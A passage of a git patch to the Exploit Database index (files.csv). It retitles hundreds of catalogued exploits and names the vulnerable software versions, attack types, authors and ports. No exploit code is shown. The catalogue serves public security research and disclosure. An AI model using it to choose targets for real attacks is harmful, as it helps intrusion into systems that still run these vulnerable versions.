From 0be21397454f58e91bd44f58aec2e99a804bb2b7 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 23 Aug 2016 05:06:48 +0000 Subject: [PATCH] DB: 2016-08-23 7 new exploits Too many to list! --- files.csv | 3159 +++++++++++++------------- platforms/cgi/webapps/40281.txt | 41 + platforms/cgi/webapps/40282.txt | 35 + platforms/cgi/webapps/40283.txt | 35 + platforms/hardware/dos/40289.txt | 268 +++ platforms/hardware/webapps/40284.txt | 63 + platforms/java/webapps/40286.txt | 107 + platforms/php/webapps/40288.txt | 70 + 8 files changed, 2202 insertions(+), 1576 deletions(-) create mode 100755 platforms/cgi/webapps/40281.txt create mode 100755 platforms/cgi/webapps/40282.txt create mode 100755 platforms/cgi/webapps/40283.txt create mode 100755 platforms/hardware/dos/40289.txt create mode 100755 platforms/hardware/webapps/40284.txt create mode 100755 platforms/java/webapps/40286.txt create mode 100755 platforms/php/webapps/40288.txt diff --git a/files.csv b/files.csv index 6ee075460..cfc422c9d 100755 --- a/files.csv +++ b/files.csv @@ -161,7 +161,7 @@ id,file,description,date,author,platform,type,port 165,platforms/windows/remote/165.c,"WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow Exploit",2004-03-23,"Hugh Mann",windows,remote,21 166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80 167,platforms/linux/remote/167.c,"Ethereal 0.10.0-0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 -168,platforms/windows/remote/168.c,"RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0 +168,platforms/windows/remote/168.c,"RealSecure / Blackice - iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Exploit",2004-03-28,blackangels,hardware,remote,0 170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0 171,platforms/linux/remote/171.c,"tcpdump ISAKMP Identification payload Integer Overflow Exploit",2004-04-05,Rapid7,linux,remote,0 @@ -352,7 +352,7 @@ id,file,description,date,author,platform,type,port 375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer - (mshtml.dll) Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos,0 378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21 -379,platforms/linux/remote/379.txt,"CVSTrac Remote Arbitrary Code Execution Exploit",2004-08-06,anonymous,linux,remote,0 +379,platforms/linux/remote/379.txt,"CVSTrac Remote - Arbitrary Code Execution Exploit",2004-08-06,anonymous,linux,remote,0 380,platforms/linux/remote/380.c,"Pavuk Digest Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 381,platforms/windows/local/381.c,"Serv-U 3.x < 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow Exploit",2002-12-24,innerphobia,linux,remote,0 @@ -499,7 +499,7 @@ id,file,description,date,author,platform,type,port 645,platforms/php/webapps/645.pl,"GFHost PHP GMail Remote Command Execution Exploit",2004-11-21,spabam,php,webapps,0 647,platforms/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution Exploit",2004-11-22,RusH,php,webapps,0 648,platforms/php/webapps/648.pl,"Invision Power Board 2.0.0 < 2.0.2 - SQL Injection Exploit",2004-11-22,RusH,php,webapps,0 -649,platforms/windows/dos/649.c,"wodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploit",2004-11-22,Komrade,windows,dos,0 +649,platforms/windows/dos/649.c,"wodFtpDLX Client - ActiveX Control Buffer Overflow Crash Exploit",2004-11-22,Komrade,windows,dos,0 650,platforms/windows/remote/650.c,"CoffeeCup FTP Clients (Direct 6.2.0.62) (Free 3.0.0.10) - BoF Exploit",2004-11-22,Komrade,windows,remote,0 651,platforms/windows/dos/651.c,"Halo 1.05 - Broadcast Client Crash Exploit",2004-11-22,"Luigi Auriemma",windows,dos,0 652,platforms/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow Exploit",2004-11-23,"Serkan Akpolat",linux,remote,8080 @@ -616,7 +616,7 @@ id,file,description,date,author,platform,type,port 790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection Exploit",2005-02-05,deluxe89,cgi,webapps,0 791,platforms/linux/local/791.c,"Setuid perl PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 792,platforms/linux/local/792.c,"Setuid perl PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0 -793,platforms/osx/local/793.pl,"Mac OS X DS_Store Arbitrary File Overwrite Exploit",2005-02-07,vade79,osx,local,0 +793,platforms/osx/local/793.pl,"Mac OS X DS_Store - Arbitrary File Overwrite Exploit",2005-02-07,vade79,osx,local,0 794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 795,platforms/osx/local/795.pl,"Mac OS X Adobe Version Cue - Local Root Exploit (Perl)",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim 4.42 - Local Root Exploit",2005-02-07,darkeagle,linux,local,0 @@ -692,7 +692,7 @@ id,file,description,date,author,platform,type,port 869,platforms/bsd/dos/869.c,"OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service",2005-03-09,RusH,bsd,dos,0 870,platforms/php/webapps/870.txt,"Download Center Lite (DCL) 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps,0 871,platforms/php/webapps/871.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 -872,platforms/php/webapps/872.pl,"SocialMPN Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0 +872,platforms/php/webapps/872.pl,"SocialMPN - Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0 873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users",2005-03-11,Ali7,php,webapps,0 874,platforms/windows/dos/874.cpp,"Ethereal 0.10.9 - '3G-A11' Remote Buffer Overflow Exploit (Windows)",2005-03-12,"Leon Juranic",windows,dos,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow Exploit",2005-03-13,class101,windows,remote,5093 @@ -758,7 +758,7 @@ id,file,description,date,author,platform,type,port 936,platforms/windows/local/936.c,"DeluxeFtp 6.x - Local Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 937,platforms/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 938,platforms/windows/local/938.cpp,"Microsoft Windows - (HTA) Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0 -939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 exit.php SQL Injection Exploit",2005-04-13,kre0n,php,webapps,0 +939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 - exit.php SQL Injection Exploit",2005-04-13,kre0n,php,webapps,0 940,platforms/linux/remote/940.c,"Sumus 0.2.2 httpd Remote Buffer Overflow Exploit",2005-04-14,vade79,linux,remote,81 941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service",2005-04-14,"Luigi Auriemma",windows,dos,0 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 @@ -805,7 +805,7 @@ id,file,description,date,author,platform,type,port 986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0 987,platforms/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,windows,remote,0 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,windows,dos,0 -989,platforms/php/webapps/989.pl,"PhotoPost Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0 +989,platforms/php/webapps/989.pl,"PhotoPost - Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0 990,platforms/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow",2005-05-17,nolimit,windows,remote,20031 996,platforms/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection Exploit",2005-05-17,RusH,php,webapps,0 997,platforms/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Local Root Exploit",2005-05-17,newbug,linux,local,0 @@ -939,7 +939,7 @@ id,file,description,date,author,platform,type,port 1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup Auto Scanner / Exploiter",2005-08-03,cybertronic,windows,remote,6070 1133,platforms/php/webapps/1133.pm,"vBulletin 3.0.6 - (Template) Command Execution Exploit (Metasploit)",2005-08-03,str0ke,php,webapps,0 1134,platforms/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - (login.php) SQL Injection Exploit",2005-08-05,"James Bercegay",php,webapps,0 -1135,platforms/php/webapps/1135.c,"PHP-Fusion 6.0 106 BBCode IMG Tag Script Injection Exploit",2005-08-05,Easyex,php,webapps,0 +1135,platforms/php/webapps/1135.c,"PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection Exploit",2005-08-05,Easyex,php,webapps,0 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,windows,dos,0 1138,platforms/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution Exploit",2005-08-05,CoKi,linux,remote,0 1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 @@ -959,7 +959,7 @@ id,file,description,date,author,platform,type,port 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0 1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0 1158,platforms/windows/dos/1158.pl,"WS_FTP Server 5.03 - (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0 -1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 +1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server 4.01a - (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro 2.52 - (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server 5.14 - Denial of Service",2005-06-07,"Reed Arvin",windows,dos,0 @@ -1016,7 +1016,7 @@ id,file,description,date,author,platform,type,port 1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - (HEAD) Denial of Service",2005-09-16,karak0rsan,windows,dos,0 1221,platforms/php/webapps/1221.php,"CuteNews 1.4.0 - (shell inject) Remote Command Execution Exploit",2005-09-17,rgod,php,webapps,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command Denial of Service",2005-09-19,basher13,windows,dos,0 -1223,platforms/windows/remote/1223.c,"Mercury Mail 4.01a (Pegasus) IMAP Buffer Overflow Exploit",2005-09-20,c0d3r,windows,remote,143 +1223,platforms/windows/remote/1223.c,"Mercury Mail 4.01a (Pegasus) - IMAP Buffer Overflow Exploit",2005-09-20,c0d3r,windows,remote,143 1224,platforms/windows/remote/1224.html,"Mozilla Browsers - 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (2)",2005-09-22,Skylined,windows,remote,0 1225,platforms/php/webapps/1225.php,"My Little Forum 1.5 - (searchstring) SQL Injection Exploit",2005-09-22,rgod,php,webapps,0 1226,platforms/php/webapps/1226.php,"phpMyFAQ 1.5.1 - (User-Agent) Remote Shell Injection Exploit",2005-09-23,rgod,php,webapps,0 @@ -1067,11 +1067,11 @@ id,file,description,date,author,platform,type,port 1273,platforms/php/webapps/1273.pl,"TClanPortal 1.1.3 - (id) SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote DoS",2005-10-27,Expanders,hardware,dos,0 1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6.0 - (mshtmled.dll) Denial of Service",2005-10-28,"Tom Ferris",windows,dos,0 -1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit",2005-10-29,ATmaCA,windows,remote,0 +1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcoded Exploit",2005-10-29,ATmaCA,windows,remote,0 1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit",2005-10-31,RusH,php,webapps,0 1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 BackOrifice Remote Buffer Overflow Exploit (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - (m) SQL Injection Exploit",2005-11-02,Devil-00,php,webapps,0 -1281,platforms/windows/dos/1281.c,"Battle Carry .005 Socket Termination Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 +1281,platforms/windows/dos/1281.c,"Battle Carry .005 Socket Termination - Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 1283,platforms/windows/dos/1283.c,"FlatFrag 0.3 - Buffer Overflow / Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 1284,platforms/windows/dos/1284.c,"Glider collectn kill 1.0.0.0 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 @@ -1091,7 +1091,7 @@ id,file,description,date,author,platform,type,port 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Local Root Exploit",2005-11-09,"Charles Stevenson",linux,local,0 1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0 1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure Exploit",2005-11-09,kingcope,bsd,local,0 -1312,platforms/php/webapps/1312.php,"Moodle 1.6dev SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0 +1312,platforms/php/webapps/1312.php,"Moodle 1.6dev - SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0 1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 1314,platforms/linux/remote/1314.rb,"Snort 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0 1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps,0 @@ -1299,7 +1299,7 @@ id,file,description,date,author,platform,type,port 1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - (.dbp) Buffer Overflow Exploit",2006-03-05,Kozan,windows,local,0 1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod (load) SQL Injection Exploit",2006-03-06,SkOd,php,webapps,0 1557,platforms/windows/dos/1557.c,"Freeciv 2.0.7 - (Jumbo Malloc) Denial of Service Crash",2006-03-06,"Luigi Auriemma",windows,dos,0 -1558,platforms/windows/dos/1558.c,"LieroX 0.62b Remote Server/Client Denial of Service",2006-03-06,"Luigi Auriemma",windows,dos,0 +1558,platforms/windows/dos/1558.c,"LieroX 0.62b - Remote Server/Client Denial of Service",2006-03-06,"Luigi Auriemma",windows,dos,0 1559,platforms/windows/dos/1559.c,"Sauerbraten 2006_02_28 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 1560,platforms/windows/dos/1560.c,"Cube 2005_08_29 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - (xrms_file_root) Code Execution Exploit",2006-03-07,rgod,php,webapps,0 @@ -1381,7 +1381,7 @@ id,file,description,date,author,platform,type,port 1644,platforms/php/webapps/1644.pl,"INDEXU 5.0.1 - (base_path) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 1645,platforms/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g Remote Code Execution Exploit",2006-04-04,undefined1_,php,webapps,0 1646,platforms/php/webapps/1646.php,"phpMyChat 0.14.5 - (SYS enter) Remote Code Execution Exploit",2006-04-05,rgod,php,webapps,0 -1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev (SYS enter) Remote Code Execution Exploit",2006-04-06,rgod,php,webapps,0 +1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev - (SYS enter) Remote Code Execution Exploit",2006-04-06,rgod,php,webapps,0 1650,platforms/php/webapps/1650.pl,"Horde Help Viewer 3.1 - Remote Command Execution Exploit",2006-04-07,deese,php,webapps,0 1651,platforms/php/dos/1651.php,"ADODB < 4.70 - (tmssql.php) Denial of Service",2006-04-09,rgod,php,dos,0 1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PhpOpenChat 3.0.x) - Server.php SQL Injection Exploit",2006-04-09,rgod,php,webapps,0 @@ -1775,7 +1775,7 @@ id,file,description,date,author,platform,type,port 2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit)",2006-07-26,ri0t,windows,remote,10616 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit)",2006-07-26,ri0t,windows,remote,0 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow Exploit (PoC)",2006-07-26,c0rrupt,windows,remote,5061 -2077,platforms/php/webapps/2077.txt,"WMNews 0.2a (base_datapath) Remote Inclusion",2006-07-27,uNfz,php,webapps,0 +2077,platforms/php/webapps/2077.txt,"WMNews 0.2a - (base_datapath) Remote Inclusion",2006-07-27,uNfz,php,webapps,0 2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component 18RC1 - Include",2006-07-27,Dr.Jr7,php,webapps,0 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - (Syslog Server) Remote Buffer Overflow Exploit",2006-07-27,"Kevin Finisterre",windows,remote,12345 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 @@ -1784,7 +1784,7 @@ id,file,description,date,author,platform,type,port 2083,platforms/php/webapps/2083.txt,"Mambo Security Images Component 3.0.5 - Inclusion",2006-07-28,Drago84,php,webapps,0 2084,platforms/php/webapps/2084.txt,"Mambo MGM Component 0.95r2 - Remote Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0 2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component 1.2 - Remote Inclusion",2006-07-29,Drago84,php,webapps,0 -2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component 3.1b Remote Inclusion",2006-07-29,Dr.Jr7,php,webapps,0 +2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component 3.1b - Remote Inclusion",2006-07-29,Dr.Jr7,php,webapps,0 2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - (cookie) Remote Code Excution Exploit",2006-07-29,r00t,php,webapps,0 2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - (links) Remote Blind SQL Injection Exploit",2006-07-30,rgod,php,webapps,0 2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0 @@ -1793,13 +1793,13 @@ id,file,description,date,author,platform,type,port 2092,platforms/php/webapps/2092.txt,"Joomla LMO Component 1.0b2 - Remote File Inclusion",2006-07-30,vitux,php,webapps,0 2094,platforms/windows/local/2094.c,"Open Cubic Player 2.6.0pre6 / 0.1.10_rc5 - Multiple BoF Exploit",2006-07-31,"Luigi Auriemma",windows,local,0 2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - (pathtohomedir) Remote Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 -2096,platforms/php/webapps/2096.txt,"MyNewsGroups 0.6b (myng_root) Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps,0 +2096,platforms/php/webapps/2096.txt,"MyNewsGroups 0.6b - (myng_root) Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps,0 2097,platforms/php/webapps/2097.txt,"NewsLetter 3.5 - (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2098,platforms/php/webapps/2098.txt,"TSEP 0.942 - (copyright.php) Remote Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 2099,platforms/php/webapps/2099.txt,"WoW Roster 1.5.1 - (subdir) Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 2100,platforms/php/webapps/2100.txt,"PHPAuction 2.1 - (phpAds_path) Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 2101,platforms/php/webapps/2101.txt,"newsReporter 1.1 - (index.php) Remote Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 -2102,platforms/php/webapps/2102.txt,"Voodoo chat 1.0RC1b (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 +2102,platforms/php/webapps/2102.txt,"Voodoo chat 1.0RC1b - (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - (dwl_include_path) Remote Inclusion",2006-08-01,SHiKaA,php,webapps,0 2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (u2uid) SQL Injection Exploit (mq=off)",2006-08-01,rgod,php,webapps,0 @@ -1900,7 +1900,7 @@ id,file,description,date,author,platform,type,port 2203,platforms/php/webapps/2203.txt,"Joomla com_jim Component 1.0.1 - Remote File Inclusion",2006-08-17,"Mehmet Ince",php,webapps,0 2204,platforms/windows/dos/2204.c,"Microsoft Windows - PNG File IHDR Block Denial of Service PoC (1)",2006-08-17,Preddy,windows,dos,0 2205,platforms/php/webapps/2205.txt,"Joomla Mosets Tree 1.0 - Remote File Inclusion",2006-08-17,Crackers_Child,php,webapps,0 -2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component 1.2 RC2b File Include",2006-08-17,Cmaster4,php,webapps,0 +2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component 1.2 RC2b - File Include",2006-08-17,Cmaster4,php,webapps,0 2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 - File Include",2006-08-17,Cmaster4,php,webapps,0 2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash Exploit",2006-08-18,Mr.Niega,windows,dos,0 2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component 1.0b4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 @@ -1916,7 +1916,7 @@ id,file,description,date,author,platform,type,port 2219,platforms/php/webapps/2219.php,"Joomla 1.0.10 - (poll component) Arbitrary Add Votes Exploit",2006-08-19,trueend5,php,webapps,0 2220,platforms/php/webapps/2220.txt,"Tutti Nova 1.6 - (TNLIB_DIR) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 -2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component 0.6b Include",2006-08-19,mdx,php,webapps,0 +2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component 0.6b - Include",2006-08-19,mdx,php,webapps,0 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - (adminlog) Remote File Incude",2006-08-19,SHiKaA,php,webapps,0 2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component 1.1 - File Include",2006-08-19,mdx,php,webapps,0 @@ -1960,7 +1960,7 @@ id,file,description,date,author,platform,type,port 2263,platforms/php/webapps/2263.txt,"Ay System CMS 2.6 - (main.php) Remote File Inclusion",2006-08-27,SHiKaA,php,webapps,0 2264,platforms/windows/local/2264.htm,"VMware 5.5.1 - (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0 2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 -2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0 +2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) - Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injection",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0 2269,platforms/php/webapps/2269.txt,"Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion",2006-08-28,SHiKaA,php,webapps,0 @@ -1974,7 +1974,7 @@ id,file,description,date,author,platform,type,port 2277,platforms/windows/remote/2277.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow Exploit (2)",2006-08-29,psylocn,windows,remote,0 2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - ZIP File Handling Local Buffer Overflow Exploit",2006-08-30,bratax,windows,local,0 2279,platforms/php/webapps/2279.txt,"phpAtm 1.21 - (include_location) Remote File Inclusion",2006-08-30,KinSize,php,webapps,0 -2280,platforms/php/webapps/2280.pl,"Lanifex DMO 2.3b (_incMgr) Remote File Inclusion Exploit",2006-08-30,Kacper,php,webapps,0 +2280,platforms/php/webapps/2280.pl,"Lanifex DMO 2.3b - (_incMgr) Remote File Inclusion Exploit",2006-08-30,Kacper,php,webapps,0 2281,platforms/php/webapps/2281.pl,"Pheap CMS 1.1 - (lpref) Remote File Inclusion Exploit",2006-08-31,Kacper,php,webapps,0 2282,platforms/php/webapps/2282.txt,"YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion",2006-08-31,MATASANOS,php,webapps,0 2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - (add router) Remote BoF Exploit",2006-09-01,"Andres Tarasco",windows,remote,0 @@ -2040,7 +2040,7 @@ id,file,description,date,author,platform,type,port 2343,platforms/php/webapps/2343.txt,"MiniPort@l 0.1.5 beta - (skiny) Remote File Inclusion",2006-09-11,Kacper,php,webapps,0 2344,platforms/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - (config) Remote File Inclusion",2006-09-11,basher13,php,webapps,0 2345,platforms/windows/remote/2345.pl,"Mercur Mailserver 5.0 SP3 - (IMAP) Remote Buffer Overflow Exploit (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 -2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a (include_path) Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 +2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a - (include_path) Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 - Include / XSS",2006-09-11,s3rv3r_hack3r,php,webapps,0 2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - (Poison NULL Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 2349,platforms/php/webapps/2349.txt,"phpBB XS 0.58 - (functions.php) Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 @@ -2069,7 +2069,7 @@ id,file,description,date,author,platform,type,port 2372,platforms/php/webapps/2372.txt,"BolinOS 4.5.5 - (gBRootPath) Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps,0 2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - (script) Remote File Inclusion Exploit",2006-09-15,Kacper,php,webapps,0 2374,platforms/php/webapps/2374.pl,"Site@School 2.4.02 - Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 